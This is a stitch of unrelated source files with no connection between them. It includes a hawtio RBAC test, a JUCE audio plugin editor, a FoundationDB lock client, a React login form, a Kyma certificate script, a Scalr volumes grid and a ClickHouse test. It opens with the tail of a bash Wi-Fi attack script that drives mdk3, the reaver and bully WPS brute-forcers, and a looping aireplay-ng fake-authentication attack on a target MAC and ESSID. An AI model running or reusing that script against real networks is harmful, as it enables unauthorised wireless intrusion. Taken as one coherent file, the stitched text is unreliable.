KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i" &> /dev/null ;
##kill -9 "$i" &> /dev/null ;
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i" &> /dev/null ;
##kill -9 "$i" &> /dev/null ;
##done
killall mdk3 2> /dev/null
fi
done
}
########################################################################################################################
function TAIL_FOR_REAVER {
while :; do
clear
timeout 10 tail -n 100 -f /etc/reaver_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function TAIL_FOR_BULLY {
while :; do
clear
timeout 10 tail -n 100 -f /etc/bully_tmp.txt 2> /dev/null;
clear
sleep 1;
AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
if [ -n "$AIREPLAY_RESET" ]; then
killall aireplay-ng
fi
timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
done
}
###########################################################################
function AIREPLAY {
while :; do
aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -q3 2>> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
echo "Please Wait..." >> /etc/aireplay_tmp.txt 2> /dev/null
sleep 1;
done
}
###########################################################################
MDK3_MAIN_MENU
|
/*
* Copyright 2016 Red Hat, Inc.
*
* Red Hat licenses this file to you under the Apache License, version
* 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package io.hawt.web;
import io.hawt.jmx.JMXSecurity;
import org.jolokia.config.Configuration;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.management.InstanceNotFoundException;
import javax.management.ObjectName;
import java.util.Arrays;
import static org.hamcrest.CoreMatchers.is;
import static org.junit.Assert.assertThat;
public class RBACRestrictorTest {
private static final Logger LOG = LoggerFactory.getLogger(RBACRestrictorTest.class);
private JMXSecurity mockJMXSecurity;
@Before
public void setUp() throws Exception {
this.mockJMXSecurity = new MockJMXSecurity();
this.mockJMXSecurity.init();
}
@After
public void tearDown() throws Exception {
this.mockJMXSecurity.destroy();
this.mockJMXSecurity = null;
}
@Test
public void noJMXSecurityMBean() throws Exception {
// make sure no JMXSecurity MBean is registered
this.mockJMXSecurity.destroy();
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "anyMethod(java.lang.String)"), is(true));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "VmName"), is(true));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Runtime"), "VmName"), is(true));
}
@Test
public void isOperationAllowed() throws Exception {
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "allowed()"), is(true));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "notAllowed()"), is(false));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "error()"), is(false));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=NoSuchType"), "noInstance()"), is(false));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "allowed(boolean,long,java.lang.String)"), is(true));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "notAllowed(boolean,long,java.lang.String)"), is(false));
}
@Test
public void isAttributeReadAllowed() throws Exception {
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "VmName"), is(true));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Memory"), "Verbose"), is(true));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "VmVersion"), is(false));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "xxx"), is(false));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("hawtio:type=NoSuchType"), "Whatever"), is(false));
}
@Test
public void isAttributeWriteAllowed() throws Exception {
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Memory"), "Verbose"), is(true));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Runtime"), "VmVersion"), is(false));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Runtime"), "xxx"), is(false));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("hawtio:type=NoSuchType"), "Whatever"), is(false));
}
private class MockJMXSecurity extends JMXSecurity {
@Override
public boolean canInvoke(String objectName, String methodName) throws Exception {
return false;
}
@Override
public boolean canInvoke(String objectName, String methodName, String[] argTypes) throws Exception {
LOG.debug("{}, {}, {}", objectName, methodName, Arrays.asList(argTypes));
if (argTypes.length == 0) {
if ("hawtio:type=Test".equals(objectName) && "allowed".equals(methodName)) {
return true;
}
if ("hawtio:type=Test".equals(objectName) && "error".equals(methodName)) {
throw new Exception();
}
if ("hawtio:type=NoSuchType".equals(objectName) && "noInstance".equals(methodName)) {
throw new InstanceNotFoundException(objectName);
}
if ("java.lang:type=Runtime".equals(objectName) && "getVmName".equals(methodName)) {
return true;
}
if ("java.lang:type=Memory".equals(objectName) && "isVerbose".equals(methodName)) {
return true;
}
} else {
if ("hawtio:type=Test".equals(objectName) && "allowed".equals(methodName) && argTypes.length == 3
&& "boolean".equals(argTypes[0]) && "long".equals(argTypes[1]) && "java.lang.String".equals(argTypes[2])) {
return true;
}
if ("java.lang:type=Memory".equals(objectName) && "setVerbose".equals(methodName) && argTypes.length == 1
&& "boolean".equals(argTypes[0])) {
return true;
}
}
return false;
}
@Override
protected String getDefaultObjectName() {
return "hawtio:type=security,area=jmx,name=MockJMXSecurity";
}
}
}
|
<filename>PitchedDelay/Source/PluginEditor.cpp
/*
==============================================================================
This file was auto-generated by the Introjucer!
It contains the basic startup code for a Juce application.
==============================================================================
*/
#include "PluginProcessor.h"
#include "PluginEditor.h"
//==============================================================================
PitchedDelayAudioProcessorEditor::PitchedDelayAudioProcessorEditor (PitchedDelayAudioProcessor* ownerFilter)
: AudioProcessorEditor (ownerFilter),
tabs(TabbedButtonBar::TabsAtTop, ownerFilter),
addPreset("+", "Add new preset"),
removePreset("-", "Remove current preset from list")
{
LookAndFeel::setDefaultLookAndFeel(&lookAndFeel);
addAndMakeVisible(&tabs);
tabs.setTabBarDepth(25);
for (int i=0; i<NUMDELAYTABS; ++i)
{
const String tabName("Delay Tap " + String(i+1));
PitchedDelayTab* delay = new PitchedDelayTab(getProcessor(), i);
delays.add(delay);
tabs.addTab(tabName, Colour(0xFFC0C0C0), delays.getLast(), false);
delay->addActionListener(this);
}
addAndMakeVisible(graph = new DelayGraph(delays, ownerFilter));
addAndMakeVisible(&dryVolume);
dryVolume.setRange(-60, 12, 0.1);
dryVolume.setSliderStyle(Slider::LinearVertical);
dryVolume.setTextBoxStyle(Slider::TextBoxBelow, false, 50, 20);
dryVolume.addListener(this);
addAndMakeVisible(&masterVolume);
masterVolume.setRange(-60, 12, 0.1);
masterVolume.setSliderStyle(Slider::LinearVertical);
masterVolume.setTextBoxStyle(Slider::TextBoxBelow, false, 50, 20);
masterVolume.addListener(this);
addAndMakeVisible(&showTooltips);
showTooltips.setButtonText("Show tooltips");
showTooltips.addListener(this);
addAndMakeVisible(&addPreset);
addPreset.addListener(this);
addAndMakeVisible(&removePreset);
removePreset.addListener(this);
addAndMakeVisible(&presetList);
presetList.addListener(this);
tooltipWindow = new TooltipWindow();
{
File presetFile(File::getSpecialLocation(File::userApplicationDataDirectory).getChildFile("lkjb").getChildFile("PitchedDelay").getChildFile("presets.xml"));
if (! presetFile.existsAsFile())
{
presetFile.getParentDirectory().createDirectory();
presetFile.replaceWithText(String(BinaryData::factorypresets_xml, BinaryData::factorypresets_xmlSize));
}
presetManager = new PresetManager(ownerFilter, presetFile);
updatePresets();
}
setSize (600, 435);
startTimer(100);
}
PitchedDelayAudioProcessorEditor::~PitchedDelayAudioProcessorEditor()
{
LookAndFeel::setDefaultLookAndFeel(nullptr);
}
void PitchedDelayAudioProcessorEditor::resized()
{
addPreset.setBounds(getWidth() - 60, 0, 30, 20);
removePreset.setBounds(getWidth() - 30, 0, 30, 20);
presetList.setBounds(getWidth() - 360, 0, 300, 20);
graph->setBounds(0, 20, 600, 100);
tabs.setBounds(0, 120, 500, 315);
dryVolume.setBounds(502, 140, 46, 265);
masterVolume.setBounds(552, 140, 46, 265);
showTooltips.setBounds(10, 0, 100, 20);
}
//==============================================================================
void PitchedDelayAudioProcessorEditor::paint (Graphics& g)
{
g.fillAll (Colour(0xFFB0B0B0));
g.setFont(Font(14.f));
g.setColour(Colours::black);
g.drawText("Dry", 500, 120, 50, 20, Justification::centred, false);
g.drawText("Master", 550, 120, 50, 20, Justification::centred, false);
g.drawText("Presets", 0, 0, getWidth()-370, 20, Justification::centredRight, false);
}
void PitchedDelayAudioProcessorEditor::timerCallback()
{
PitchedDelayAudioProcessor* Proc = getProcessor();
const int currentTab = Proc->currentTab;
if (currentTab != tabs.getCurrentTabIndex() && currentTab >= 0)
tabs.setCurrentTabIndex(currentTab, false);
dryVolume.setValue(12. + Decibels::gainToDecibels(Proc->getParameter(Proc->getNumDelayParameters() + PitchedDelayAudioProcessor::kDryVolume)));
masterVolume.setValue(12. + Decibels::gainToDecibels(Proc->getParameter(Proc->getNumDelayParameters() + PitchedDelayAudioProcessor::kMasterVolume)));
showTooltips.setToggleState(Proc->showTooltips, dontSendNotification);
if (Proc->showTooltips && tooltipWindow == nullptr)
tooltipWindow = new TooltipWindow();
else if (! Proc->showTooltips && tooltipWindow != nullptr)
tooltipWindow = 0;
for (int i=0; i<tabs.getNumTabs(); ++i)
{
const String tabName(String(Proc->getDelay(i)->isEnabled() ? "*" : "") + "Delay Tap " + String(i+1));
tabs.setTabName(i, tabName);
}
}
void PitchedDelayAudioProcessorEditor::actionListenerCallback(const String& message)
{
PitchedDelayAudioProcessor* Proc = getProcessor();
StringArray cmds;
const int numCmds = cmds.addTokens(message, ":", "");
if (numCmds == 3 && cmds[0].startsWith("Tab"))
{
const String tab(cmds[0]);
const String param(cmds[1]);
const String val(cmds[2]);
const int delayIdx = tab.substring(3).getIntValue();
const double value = val.getDoubleValue();
int paramIdx = -1;
DelayTabDsp* dsp = Proc->getDelay(delayIdx);
jassert(dsp != 0);
if (param == "Delay")
{
paramIdx = DelayTabDsp::kDelay;
}
else if (param == "Sync")
{
paramIdx = DelayTabDsp::kSync;
}
else if (param == "Pitch")
{
paramIdx = DelayTabDsp::kPitch;
}
else if (param == "PitchType")
{
paramIdx = DelayTabDsp::kPitchType;
}
else if (param == "Feedback")
{
paramIdx = DelayTabDsp::kFeedback;
}
else if (param == "EqFreq")
{
paramIdx = DelayTabDsp::kFilterFreq;
}
else if (param == "EqQ")
{
paramIdx = DelayTabDsp::kFilterQ;
}
else if (param == "EqGain")
{
paramIdx = DelayTabDsp::kFilterGain;
}
else if (param == "Volume")
{
paramIdx = DelayTabDsp::kVolume;
}
else if (param == "Pan")
{
paramIdx = DelayTabDsp::kPan;
}
else if (param == "EqType")
{
paramIdx = DelayTabDsp::kFilterType;
}
else if (param == "PrePitch")
{
paramIdx = DelayTabDsp::kPrePitch;
}
else if (param == "Enabled")
{
paramIdx = DelayTabDsp::kEnabled;
}
else if (param == "Mode")
{
paramIdx = DelayTabDsp::kMode;
}
else if (param == "Predelay")
{
paramIdx = DelayTabDsp::kPreDelay;
}
else if (param == "PredelayVol")
{
paramIdx = DelayTabDsp::kPreDelayVol;
}
else
{
jassertfalse;
}
if (paramIdx >= 0)
{
const int procParem = paramIdx + delayIdx * DelayTabDsp::kNumParameters;
Proc->setParameterNotifyingHost(procParem, dsp->plainToNormalized(paramIdx, value));
}
}
}
void PitchedDelayAudioProcessorEditor::sliderValueChanged (Slider* slider)
{
PitchedDelayAudioProcessor* Proc = getProcessor();
if (slider == &dryVolume)
{
Proc->setParameterNotifyingHost(Proc->getNumDelayParameters() + PitchedDelayAudioProcessor::kDryVolume, Decibels::decibelsToGain((float) dryVolume.getValue() - 12.f));
}
else if (slider == &masterVolume)
{
Proc->setParameterNotifyingHost(Proc->getNumDelayParameters() + PitchedDelayAudioProcessor::kMasterVolume, Decibels::decibelsToGain((float) masterVolume.getValue() - 12.f));
}
}
void PitchedDelayAudioProcessorEditor::buttonClicked (Button* button)
{
if (button == &showTooltips)
{
getProcessor()->showTooltips = showTooltips.getToggleState();
}
else if (button == &addPreset)
{
AlertWindow aw("Add Preset", "Add preset", AlertWindow::QuestionIcon, this);
aw.addTextEditor("name", presetList.getText(), "Preset name");
aw.addButton("OK", 1, KeyPress(KeyPress::returnKey));
aw.addButton("Cancel", 2, KeyPress(KeyPress::escapeKey));
if (aw.runModalLoop() == 1)
{
const String presetName(aw.getTextEditor("name")->getText());
StringArray presetNames(presetManager->getPresetNames());
if (presetName.isEmpty())
{
AlertWindow::showMessageBox(AlertWindow::WarningIcon, "Invalid name", "No Preset name specified", "OK");
return;
}
if (presetNames.contains(presetName))
{
if (! AlertWindow::showOkCancelBox(AlertWindow::QuestionIcon, "Overwrite Preset", "Overwrite " + presetName.quoted() + "?", "Overwrite", "Cancel", this))
return;
}
presetManager->storePreset(presetName);
updatePresets();
}
}
else if (button == &removePreset)
{
const String presetName(presetList.getText());
if (presetName.isEmpty())
return;
if (! AlertWindow::showOkCancelBox(AlertWindow::QuestionIcon, "Remove Preset", "Remove " + presetName.quoted() + "?", "Remove", "Cancel", this))
return;
presetManager->removePreset(presetName, true);
updatePresets();
}
}
void PitchedDelayAudioProcessorEditor::comboBoxChanged (ComboBox* comboBoxThatHasChanged)
{
if (comboBoxThatHasChanged == &presetList)
{
const String presetName(presetList.getText());
presetManager->loadPreset(presetName);
}
}
void PitchedDelayAudioProcessorEditor::updatePresets()
{
StringArray presets(presetManager->getPresetNames());
presets.sort(true);
presetList.clear();
for (int i=0; i<presets.size(); ++i)
presetList.addItem(presets[i], i+1);
presetList.setSelectedId(0);
}
|
/*
* lock_client.go
*
* This source file is part of the FoundationDB open source project
*
* Copyright 2021 Apple Inc. and the FoundationDB project authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package fdbclient
import (
"fmt"
"time"
fdbtypes "github.com/FoundationDB/fdb-kubernetes-operator/api/v1beta1"
controllers "github.com/FoundationDB/fdb-kubernetes-operator/controllers"
"github.com/apple/foundationdb/bindings/go/src/fdb"
"github.com/apple/foundationdb/bindings/go/src/fdb/tuple"
)
// RealLockClient provides a client for managing operation locks through the
// database.
type realLockClient struct {
// The cluster we are managing locks for.
cluster *fdbtypes.FoundationDBCluster
// Whether we should disable locking completely.
disableLocks bool
// The connection to the database.
database fdb.Database
}
// Disabled determines if the client should automatically grant locks.
func (client *realLockClient) Disabled() bool {
return client.disableLocks
}
// TakeLock attempts to acquire a lock.
func (client *realLockClient) TakeLock() (bool, error) {
if client.disableLocks {
return true, nil
}
hasLock, err := client.database.Transact(func(transaction fdb.Transaction) (interface{}, error) {
return client.takeLockInTransaction(transaction)
})
if hasLock == nil {
return false, err
}
return hasLock.(bool), err
}
// takeLockInTransaction attempts to acquire a lock using an open transaction.
func (client *realLockClient) takeLockInTransaction(transaction fdb.Transaction) (bool, error) {
err := transaction.Options().SetAccessSystemKeys()
if err != nil {
return false, err
}
lockKey := fdb.Key(fmt.Sprintf("%s/global", client.cluster.GetLockPrefix()))
lockValue := transaction.Get(lockKey).MustGet()
if len(lockValue) == 0 {
log.Info("Setting initial lock")
client.updateLock(transaction, 0)
return true, nil
}
lockTuple, err := tuple.Unpack(lockValue)
if err != nil {
return false, err
}
if len(lockTuple) < 3 {
return false, invalidLockValue{key: lockKey, value: lockValue}
}
ownerID, valid := lockTuple[0].(string)
if !valid {
return false, invalidLockValue{key: lockKey, value: lockValue}
}
startTime, valid := lockTuple[1].(int64)
if !valid {
return false, invalidLockValue{key: lockKey, value: lockValue}
}
endTime, valid := lockTuple[2].(int64)
if !valid {
return false, invalidLockValue{key: lockKey, value: lockValue}
}
cluster := client.cluster
newOwnerDenied := transaction.Get(client.getDenyListKey(cluster.GetLockID())).MustGet() != nil
if newOwnerDenied {
log.Info("Failed to get lock due to deny list", "namespace", cluster.Namespace, "cluster", cluster.Name)
return false, nil
}
oldOwnerDenied := transaction.Get(client.getDenyListKey(ownerID)).MustGet() != nil
shouldClear := endTime < time.Now().Unix() || oldOwnerDenied
if shouldClear {
log.Info("Clearing expired lock", "namespace", cluster.Namespace, "cluster", cluster.Name, "owner", ownerID, "startTime", time.Unix(startTime, 0), "endTime", time.Unix(endTime, 0))
client.updateLock(transaction, startTime)
return true, nil
}
if ownerID == client.cluster.GetLockID() {
log.Info("Extending previous lock", "namespace", cluster.Namespace, "cluster", cluster.Name, "owner", ownerID, "startTime", time.Unix(startTime, 0), "endTime", time.Unix(endTime, 0))
client.updateLock(transaction, startTime)
return true, nil
}
log.Info("Failed to get lock", "namespace", cluster.Namespace, "cluster", cluster.Name, "owner", ownerID, "startTime", time.Unix(startTime, 0), "endTime", time.Unix(endTime, 0))
return false, nil
}
// updateLock sets the keys to acquire a lock.
func (client *realLockClient) updateLock(transaction fdb.Transaction, start int64) {
lockKey := fdb.Key(fmt.Sprintf("%s/global", client.cluster.GetLockPrefix()))
if start == 0 {
start = time.Now().Unix()
}
end := time.Now().Add(client.cluster.GetLockDuration()).Unix()
lockValue := tuple.Tuple{
client.cluster.GetLockID(),
start,
end,
}
log.Info("Setting new lock", "namespace", client.cluster.Namespace, "cluster", client.cluster.Name, "lockValue", lockValue)
transaction.Set(lockKey, lockValue.Pack())
}
// AddPendingUpgrades registers information about which process groups are
// pending an upgrade to a new version.
func (client *realLockClient) AddPendingUpgrades(version fdbtypes.FdbVersion, processGroupIDs []string) error {
_, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
err := tr.Options().SetAccessSystemKeys()
if err != nil {
return nil, err
}
for _, processGroupID := range processGroupIDs {
key := fdb.Key(fmt.Sprintf("%s/upgrades/%s/%s", client.cluster.GetLockPrefix(), version.String(), processGroupID))
tr.Set(key, []byte(processGroupID))
}
return nil, nil
})
return err
}
// GetPendingUpgrades returns the stored information about which process
// groups are pending an upgrade to a new version.
func (client *realLockClient) GetPendingUpgrades(version fdbtypes.FdbVersion) (map[string]bool, error) {
upgrades, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
err := tr.Options().SetReadSystemKeys()
if err != nil {
return nil, err
}
keyPrefix := []byte(fmt.Sprintf("%s/upgrades/%s/", client.cluster.GetLockPrefix(), version.String()))
keyRange, err := fdb.PrefixRange(keyPrefix)
if err != nil {
return nil, err
}
results := tr.GetRange(keyRange, fdb.RangeOptions{}).GetSliceOrPanic()
upgrades := make(map[string]bool, len(results))
for _, result := range results {
upgrades[string(result.Value)] = true
}
return upgrades, nil
})
if err != nil {
return nil, err
}
upgradeMap, isMap := upgrades.(map[string]bool)
if !isMap {
return nil, fmt.Errorf("invalid return value from transaction in GetPendingUpgrades: %v", upgrades)
}
return upgradeMap, nil
}
// ClearPendingUpgrades clears any stored information about pending
// upgrades.
func (client *realLockClient) ClearPendingUpgrades() error {
_, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
err := tr.Options().SetAccessSystemKeys()
if err != nil {
return nil, err
}
keyPrefix := []byte(fmt.Sprintf("%s/upgrades/", client.cluster.GetLockPrefix()))
keyRange, err := fdb.PrefixRange(keyPrefix)
if err != nil {
return nil, err
}
tr.ClearRange(keyRange)
return nil, nil
})
return err
}
// GetDenyList retrieves the current deny list from the database.
func (client *realLockClient) GetDenyList() ([]string, error) {
list, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
err := tr.Options().SetReadSystemKeys()
if err != nil {
return nil, err
}
keyRange, err := client.getDenyListKeyRange()
if err != nil {
return nil, err
}
values := tr.GetRange(keyRange, fdb.RangeOptions{}).GetSliceOrPanic()
list := make([]string, len(values))
for index, value := range values {
list[index] = string(value.Value)
}
return list, nil
})
if err != nil {
return nil, err
}
return list.([]string), nil
}
// UpdateDenyList updates the deny list to match a list of entries.
func (client *realLockClient) UpdateDenyList(locks []fdbtypes.LockDenyListEntry) error {
_, err := client.database.Transact(func(tr fdb.Transaction) (interface{}, error) {
err := tr.Options().SetAccessSystemKeys()
if err != nil {
return nil, err
}
keyRange, err := client.getDenyListKeyRange()
if err != nil {
return nil, err
}
values := tr.GetRange(keyRange, fdb.RangeOptions{}).GetSliceOrPanic()
denyListMap := make(map[string]bool, len(values))
for _, value := range values {
denyListMap[string(value.Value)] = true
}
for _, entry := range locks {
if entry.Allow && denyListMap[entry.ID] {
tr.Clear(client.getDenyListKey(entry.ID))
} else if !entry.Allow && !denyListMap[entry.ID] {
tr.Set(client.getDenyListKey(entry.ID), []byte(entry.ID))
}
}
return nil, nil
})
return err
}
// getDenyListKeyRange defines a key range containing the full deny list.
func (client *realLockClient) getDenyListKeyRange() (fdb.KeyRange, error) {
keyPrefix := []byte(fmt.Sprintf("%s/denyList/", client.cluster.GetLockPrefix()))
return fdb.PrefixRange(keyPrefix)
}
// getDenyListKeyRange defines a key range containing a potential deny list
// entry for an owner ID.
func (client *realLockClient) getDenyListKey(id string) fdb.Key {
return fdb.Key(fmt.Sprintf("%s/denyList/%s", client.cluster.GetLockPrefix(), id))
}
// invalidLockValue is an error we can return when we cannot parse the existing
// values in the locking system.
type invalidLockValue struct {
key fdb.Key
value []byte
}
// Error formats the error message.
func (err invalidLockValue) Error() string {
return fmt.Sprintf("Could not decode value %s for key %s", err.value, err.key)
}
// NewRealLockClient creates a lock client.
func NewRealLockClient(cluster *fdbtypes.FoundationDBCluster) (controllers.LockClient, error) {
if !cluster.ShouldUseLocks() {
return &realLockClient{disableLocks: true}, nil
}
database, err := getFDBDatabase(cluster)
if err != nil {
return nil, err
}
return &realLockClient{cluster: cluster, database: database}, nil
}
|
<filename>src/components/login/LoginForm.tsx
import { Link } from "react-router-dom";
import styled from "styled-components";
import { theme } from "styled-tools";
import { IdIcon, PwIcon } from "assets";
export default function LoginWrapper() {
return (
<form>
<StInput>
<IdIcon />
<input id="id" placeholder="아이디를 입력해주세요" />
</StInput>
<StInput>
<PwIcon />
<input id="pw" type="password" placeholder="비밀번호를 입력해주세요" />
</StInput>
<StLoginButton>
<Link to="/main/dashboard">로그인</Link>
</StLoginButton>
</form>
);
}
const StInput = styled.div`
display: flex;
align-items: center;
border-radius: 0.4rem;
border: 1px solid ${theme("colors.chartLineGray")};
background-color: ${theme("colors.pointWhite")};
width: 36.9rem;
height: 4.5rem;
margin-bottom: 2.7rem;
& > svg {
width: 1.9rem;
margin: 1.2rem 0 1.2rem 2rem;
}
& > input {
margin-left: 1.2rem;
}
`;
const StLoginButton = styled.p`
display: flex;
justify-content: center;
align-items: center;
background-color: ${theme("colors.mainColor")};
border-radius: 0.4rem;
width: 36.9rem;
height: 4.5rem;
margin-top: 1.2rem;
& > a {
text-align: center;
${theme("fonts.korBold")};
color: ${theme("colors.pointWhite")};
}
`;
|
set -o errexit
tmpfile=$(mktemp /tmp/temp-cert.XXXXXX) \
&& kubectl get configmap net-global-overrides -n kyma-installer -o jsonpath='{.data.global\.ingress\.tlsCrt}' | base64 --decode > $tmpfile \
&& sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain $tmpfile \
&& rm $tmpfile
sh $GOPATH/src/github.com/kyma-project/kyma/installation/scripts/tiller-tls.sh
echo "Certificates provided." |
<gh_stars>1-10
Scalr.regPage('Scalr.ui.tools.cloudstack.volumes.view', function (loadParams, moduleParams) {
var store = Ext.create('store.store', {
fields: [
'farmId', 'farmRoleId', 'farmName', 'roleName', 'mysql_master_volume', 'mountStatus', 'serverIndex', 'serverId',
'volumeId', 'size', 'type', 'storage', 'status', 'attachmentStatus', 'device', 'instanceId', 'autoSnaps', 'autoAttach'
],
proxy: {
type: 'scalr.paging',
url: '/tools/cloudstack/volumes/xListVolumes/'
},
remoteSort: true
});
return Ext.create('Ext.grid.Panel', {
scalrOptions: {
reload: true,
maximize: 'all',
menuTitle: Scalr.utils.getPlatformName(loadParams['platform']) + ' » Volumes',
//menuFavorite: true
},
store: store,
stateId: 'grid-tools-cloudstack-volumes-view',
stateful: true,
plugins: [{
ptype: 'gridstore'
}, {
ptype: 'applyparams',
filterIgnoreParams: [ 'platform' ]
}],
viewConfig: {
emptyText: 'No volumes found',
loadingText: 'Loading volumes ...'
},
columns: [
{ header: "Used by", flex: 1, dataIndex: 'farmId', sortable: false, xtype: 'templatecolumn', tpl:
'<tpl if="farmId">' +
'<a href="#/farms?farmId={farmId}" title="Farm {farmName}">{farmName}</a>' +
'<tpl if="roleName">' +
' → <a href="#/farms/{farmId}/roles/{farmRoleId}/view" title="Role {roleName}">' +
'{roleName}</a> #<a href="#/servers?serverId={serverId}">{serverIndex}</a>' +
'</tpl>' +
'</tpl>' +
'<tpl if="!farmId">—</tpl>'
},
{ header: "Volume ID", width: 110, dataIndex: 'volumeId', sortable: true },
{ header: "Size (GB)", width: 110, dataIndex: 'size', sortable: true },
{ header: "Type", width: 150, dataIndex: 'type', sortable: true},
{ header: "Storage", width: 120, dataIndex: 'storage', sortable: true },
{ header: "Status", width: 180, dataIndex: 'status', sortable: true, xtype: 'templatecolumn', tpl:
'{status}' +
'<tpl if="attachmentStatus"> / {attachmentStatus}</tpl>' +
'<tpl if="device"> ({device})</tpl>'
},
{ header: "Mount status", width: 110, dataIndex: 'mountStatus', sortable: false, xtype: 'templatecolumn', tpl:
'<tpl if="mountStatus">{mountStatus}</tpl>' +
'<tpl if="!mountStatus">—</tpl>'
},
{ header: "Instance ID", width: 115, dataIndex: 'instanceId', sortable: true, xtype: 'templatecolumn', tpl:
'<tpl if="instanceId">{instanceId}</tpl>'
},
{ header: "Auto-snaps", width: 110, dataIndex: 'autoSnaps', sortable: false, align:'center', xtype: 'templatecolumn', tpl:
'<tpl if="autoSnaps"><div class="x-grid-icon x-grid-icon-simple x-grid-icon-ok"></div></tpl>' +
'<tpl if="!autoSnaps">—</tpl>'
},
{ header: "Auto-attach", width: 130, dataIndex: 'autoAttach', sortable: false, align:'center', xtype: 'templatecolumn', tpl:
'<tpl if="autoAttach"><div class="x-grid-icon x-grid-icon-simple x-grid-icon-ok"></div></tpl>' +
'<tpl if="!autoAttach">—</tpl>'
}
],
selModel: Scalr.isAllowed('CLOUDSTACK_VOLUMES', 'manage') ? 'selectedmodel' : null,
listeners: {
selectionchange: function(selModel, selections) {
this.down('scalrpagingtoolbar').down('#delete').setDisabled(!selections.length);
}
},
dockedItems: [{
xtype: 'scalrpagingtoolbar',
store: store,
dock: 'top',
afterItems: [{
itemId: 'delete',
iconCls: 'x-btn-icon-delete',
cls: 'x-btn-red',
tooltip: 'Select one or more volume(s) to delete them',
disabled: true,
hidden: !Scalr.isAllowed('CLOUDSTACK_VOLUMES', 'manage'),
handler: function() {
var request = {
confirmBox: {
type: 'delete',
msg: 'Delete selected volume(s): %s ?'
},
processBox: {
type: 'delete',
msg: 'Deleting volume(s) ...'
},
url: '/tools/cloudstack/volumes/xRemove/',
success: function() {
store.load();
}
}, records = this.up('grid').getSelectionModel().getSelection(), data = [];
request.confirmBox.objects = [];
for (var i = 0, len = records.length; i < len; i++) {
data.push(records[i].get('volumeId'));
request.confirmBox.objects.push(records[i].get('volumeId'));
}
request.params = { volumeId: Ext.encode(data), cloudLocation: store.proxy.extraParams.cloudLocation, platform: store.proxy.extraParams.platform };
Scalr.Request(request);
}
}],
items: [{
xtype: 'filterfield',
store: store
}, ' ', {
xtype: 'cloudlocationfield',
platforms: [loadParams['platform']],
gridStore: store
}]
}]
});
});
|
require 'tracer_client/errors/application_error'
class LogicError < ApplicationError
end
|
#!/usr/bin/env bash
CLICKHOUSE_LOG_COMMENT=''
CURDIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# shellcheck source=../shell_config.sh
. "$CURDIR"/../shell_config.sh
$CLICKHOUSE_CLIENT --query="select toUInt64(pow(2, 62)) as value format JSON" --output_format_json_quote_64bit_integers=0 | grep value
$CLICKHOUSE_CLIENT --query="select toUInt64(pow(2, 62)) as value format JSON" --output_format_json_quote_64bit_integers=1 | grep value
